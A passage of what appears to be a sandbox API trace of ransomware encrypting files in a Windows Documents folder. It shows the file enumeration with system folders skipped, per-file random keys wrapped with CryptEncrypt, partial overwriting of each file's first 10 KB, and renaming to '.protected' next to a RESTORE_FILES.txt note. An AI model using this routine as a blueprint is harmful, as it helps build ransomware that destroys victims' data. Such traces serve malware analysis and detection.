wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\fP3R PjQkBuI-4.pptx.protected") returned 80 [0091.379] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\fP3R PjQkBuI-4.pptx" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\documents\\mxlov\\fp3r pjqkbui-4.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\fP3R PjQkBuI-4.pptx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\fp3r pjqkbui-4.pptx.protected")) returned 1 [0091.380] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.380] lstrcmpiW (lpString1="J2Md7SeLwOtzt.pptx", lpString2="Windows") returned -1 [0091.380] lstrcmpiW (lpString1="J2Md7SeLwOtzt.pptx", lpString2="Program Files") returned -1 [0091.380] lstrcmpiW (lpString1="J2Md7SeLwOtzt.pptx", lpString2="Program Files (x86)") returned -1 [0091.380] lstrcmpiW (lpString1="J2Md7SeLwOtzt.pptx", lpString2="$Recycle.bin") returned 1 [0091.380] lstrcmpiW (lpString1="J2Md7SeLwOtzt.pptx", lpString2="System Volume Information") returned -1 [0091.380] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\J2Md7SeLwOtzt.pptx") returned 68 [0091.380] StrStrIW (lpFirst="J2Md7SeLwOtzt.pptx", lpSrch=".protected") returned 0x0 [0091.380] lstrcmpW (lpString1="J2Md7SeLwOtzt.pptx", lpString2="RESTORE_FILES.txt") returned -1 [0091.380] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.380] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.380] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\J2Md7SeLwOtzt.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\j2md7selwotzt.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.380] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Documents\\Mxlov\\J2Md7SeLwOtzt.pptx") returned 68 [0091.380] StrStrW (lpFirst="J2Md7SeLwOtzt.pptx", lpSrch=".txt") returned 0x0 [0091.380] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\J2Md7SeLwOtzt.pptx") returned 68 [0091.380] StrStrW (lpFirst="J2Md7SeLwOtzt.pptx", lpSrch=".rar") returned 0x0 [0091.380] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\J2Md7SeLwOtzt.pptx") returned 68 [0091.380] StrStrW (lpFirst="J2Md7SeLwOtzt.pptx", lpSrch=".zip") returned 0x0 [0091.380] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.381] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.381] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.382] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.382] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.382] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.382] CloseHandle (hObject=0xd4) returned 1 [0091.383] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Documents\\Mxlov\\J2Md7SeLwOtzt.pptx.protected") returned 78 [0091.383] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\J2Md7SeLwOtzt.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\j2md7selwotzt.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\J2Md7SeLwOtzt.pptx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\j2md7selwotzt.pptx.protected")) returned 1 [0091.383] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.383] lstrcmpiW (lpString1="jGG-XtEiWWZRu.ods", lpString2="Windows") returned -1 [0091.383] lstrcmpiW (lpString1="jGG-XtEiWWZRu.ods", lpString2="Program Files") returned -1 [0091.383] lstrcmpiW (lpString1="jGG-XtEiWWZRu.ods", lpString2="Program Files (x86)") returned -1 [0091.383] lstrcmpiW (lpString1="jGG-XtEiWWZRu.ods", lpString2="$Recycle.bin") returned 1 [0091.383] lstrcmpiW (lpString1="jGG-XtEiWWZRu.ods", lpString2="System Volume Information") returned -1 [0091.383] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\jGG-XtEiWWZRu.ods") returned 67 [0091.383] StrStrIW (lpFirst="jGG-XtEiWWZRu.ods", lpSrch=".protected") returned 0x0 [0091.383] lstrcmpW (lpString1="jGG-XtEiWWZRu.ods", lpString2="RESTORE_FILES.txt") returned -1 [0091.383] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.383] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.384] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\jGG-XtEiWWZRu.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\jgg-xteiwwzru.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.384] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\jGG-XtEiWWZRu.ods") returned 67 [0091.384] StrStrW (lpFirst="jGG-XtEiWWZRu.ods", lpSrch=".txt") returned 0x0 [0091.384] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\jGG-XtEiWWZRu.ods") returned 67 [0091.384] StrStrW (lpFirst="jGG-XtEiWWZRu.ods", lpSrch=".rar") returned 0x0 [0091.384] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\jGG-XtEiWWZRu.ods") returned 67 [0091.384] StrStrW (lpFirst="jGG-XtEiWWZRu.ods", lpSrch=".zip") returned 0x0 [0091.384] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.385] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.385] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.385] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.385] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.385] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.385] CloseHandle (hObject=0xd4) returned 1 
[0091.386] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\jGG-XtEiWWZRu.ods.protected") returned 77 [0091.386] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\jGG-XtEiWWZRu.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\jgg-xteiwwzru.ods"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\jGG-XtEiWWZRu.ods.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\jgg-xteiwwzru.ods.protected")) returned 1 [0091.387] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.387] lstrcmpiW (lpString1="K8LjWYb.ods", lpString2="Windows") returned -1 [0091.387] lstrcmpiW (lpString1="K8LjWYb.ods", lpString2="Program Files") returned -1 [0091.387] lstrcmpiW (lpString1="K8LjWYb.ods", lpString2="Program Files (x86)") returned -1 [0091.387] lstrcmpiW (lpString1="K8LjWYb.ods", lpString2="$Recycle.bin") returned 1 [0091.387] lstrcmpiW (lpString1="K8LjWYb.ods", lpString2="System Volume Information") returned -1 [0091.387] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\K8LjWYb.ods") returned 61 [0091.387] StrStrIW (lpFirst="K8LjWYb.ods", lpSrch=".protected") returned 0x0 [0091.387] lstrcmpW (lpString1="K8LjWYb.ods", lpString2="RESTORE_FILES.txt") returned -1 [0091.387] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.387] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.387] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\K8LjWYb.ods" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\documents\\mxlov\\k8ljwyb.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.388] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\K8LjWYb.ods") returned 61 [0091.388] StrStrW (lpFirst="K8LjWYb.ods", lpSrch=".txt") returned 0x0 [0091.388] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\K8LjWYb.ods") returned 61 [0091.388] StrStrW (lpFirst="K8LjWYb.ods", lpSrch=".rar") returned 0x0 [0091.388] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\K8LjWYb.ods") returned 61 [0091.388] StrStrW (lpFirst="K8LjWYb.ods", lpSrch=".zip") returned 0x0 [0091.388] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.388] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.388] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.389] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.389] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.389] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) 
returned 1 [0091.389] CloseHandle (hObject=0xd4) returned 1 [0091.390] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\K8LjWYb.ods.protected") returned 71 [0091.390] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\K8LjWYb.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\k8ljwyb.ods"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\K8LjWYb.ods.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\k8ljwyb.ods.protected")) returned 1 [0091.393] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.393] lstrcmpiW (lpString1="PhR9uIlYXrr8.docx", lpString2="Windows") returned -1 [0091.393] lstrcmpiW (lpString1="PhR9uIlYXrr8.docx", lpString2="Program Files") returned -1 [0091.393] lstrcmpiW (lpString1="PhR9uIlYXrr8.docx", lpString2="Program Files (x86)") returned -1 [0091.393] lstrcmpiW (lpString1="PhR9uIlYXrr8.docx", lpString2="$Recycle.bin") returned 1 [0091.393] lstrcmpiW (lpString1="PhR9uIlYXrr8.docx", lpString2="System Volume Information") returned -1 [0091.393] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\PhR9uIlYXrr8.docx") returned 67 [0091.393] StrStrIW (lpFirst="PhR9uIlYXrr8.docx", lpSrch=".protected") returned 0x0 [0091.393] lstrcmpW (lpString1="PhR9uIlYXrr8.docx", lpString2="RESTORE_FILES.txt") returned -1 [0091.393] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.393] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.393] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Documents\\Mxlov\\PhR9uIlYXrr8.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\phr9uilyxrr8.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.394] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\PhR9uIlYXrr8.docx") returned 67 [0091.394] StrStrW (lpFirst="PhR9uIlYXrr8.docx", lpSrch=".txt") returned 0x0 [0091.394] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\PhR9uIlYXrr8.docx") returned 67 [0091.394] StrStrW (lpFirst="PhR9uIlYXrr8.docx", lpSrch=".rar") returned 0x0 [0091.394] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\PhR9uIlYXrr8.docx") returned 67 [0091.394] StrStrW (lpFirst="PhR9uIlYXrr8.docx", lpSrch=".zip") returned 0x0 [0091.394] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.395] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.395] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.395] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.395] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.395] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, 
lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.395] CloseHandle (hObject=0xd4) returned 1 [0091.396] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\PhR9uIlYXrr8.docx.protected") returned 77 [0091.396] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\PhR9uIlYXrr8.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\phr9uilyxrr8.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\PhR9uIlYXrr8.docx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\phr9uilyxrr8.docx.protected")) returned 1 [0091.397] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.397] lstrcmpiW (lpString1="Ps6KhxYxI.odp", lpString2="Windows") returned -1 [0091.397] lstrcmpiW (lpString1="Ps6KhxYxI.odp", lpString2="Program Files") returned 1 [0091.397] lstrcmpiW (lpString1="Ps6KhxYxI.odp", lpString2="Program Files (x86)") returned 1 [0091.397] lstrcmpiW (lpString1="Ps6KhxYxI.odp", lpString2="$Recycle.bin") returned 1 [0091.397] lstrcmpiW (lpString1="Ps6KhxYxI.odp", lpString2="System Volume Information") returned -1 [0091.397] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\Ps6KhxYxI.odp") returned 63 [0091.397] StrStrIW (lpFirst="Ps6KhxYxI.odp", lpSrch=".protected") returned 0x0 [0091.397] lstrcmpW (lpString1="Ps6KhxYxI.odp", lpString2="RESTORE_FILES.txt") returned -1 [0091.397] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.397] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, 
pdwDataLen=0x295eee4*=0x30) returned 1 [0091.397] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\Ps6KhxYxI.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\ps6khxyxi.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.397] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\Ps6KhxYxI.odp") returned 63 [0091.397] StrStrW (lpFirst="Ps6KhxYxI.odp", lpSrch=".txt") returned 0x0 [0091.397] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\Ps6KhxYxI.odp") returned 63 [0091.397] StrStrW (lpFirst="Ps6KhxYxI.odp", lpSrch=".rar") returned 0x0 [0091.397] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\Ps6KhxYxI.odp") returned 63 [0091.397] StrStrW (lpFirst="Ps6KhxYxI.odp", lpSrch=".zip") returned 0x0 [0091.397] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.398] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.398] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.399] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.399] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.399] WriteFile (in: 
hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.399] CloseHandle (hObject=0xd4) returned 1 [0091.399] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\Ps6KhxYxI.odp.protected") returned 73 [0091.399] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\Ps6KhxYxI.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\ps6khxyxi.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\Ps6KhxYxI.odp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\ps6khxyxi.odp.protected")) returned 1 [0091.400] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.400] lstrcmpiW (lpString1="qt1IqkPEmb_p.xlsx", lpString2="Windows") returned -1 [0091.400] lstrcmpiW (lpString1="qt1IqkPEmb_p.xlsx", lpString2="Program Files") returned 1 [0091.400] lstrcmpiW (lpString1="qt1IqkPEmb_p.xlsx", lpString2="Program Files (x86)") returned 1 [0091.400] lstrcmpiW (lpString1="qt1IqkPEmb_p.xlsx", lpString2="$Recycle.bin") returned 1 [0091.400] lstrcmpiW (lpString1="qt1IqkPEmb_p.xlsx", lpString2="System Volume Information") returned -1 [0091.400] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\qt1IqkPEmb_p.xlsx") returned 67 [0091.400] StrStrIW (lpFirst="qt1IqkPEmb_p.xlsx", lpSrch=".protected") returned 0x0 [0091.400] lstrcmpW (lpString1="qt1IqkPEmb_p.xlsx", lpString2="RESTORE_FILES.txt") returned -1 [0091.400] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.401] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, 
pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.401] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\qt1IqkPEmb_p.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\qt1iqkpemb_p.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.401] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\qt1IqkPEmb_p.xlsx") returned 67 [0091.401] StrStrW (lpFirst="qt1IqkPEmb_p.xlsx", lpSrch=".txt") returned 0x0 [0091.401] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\qt1IqkPEmb_p.xlsx") returned 67 [0091.401] StrStrW (lpFirst="qt1IqkPEmb_p.xlsx", lpSrch=".rar") returned 0x0 [0091.401] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\qt1IqkPEmb_p.xlsx") returned 67 [0091.401] StrStrW (lpFirst="qt1IqkPEmb_p.xlsx", lpSrch=".zip") returned 0x0 [0091.401] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, 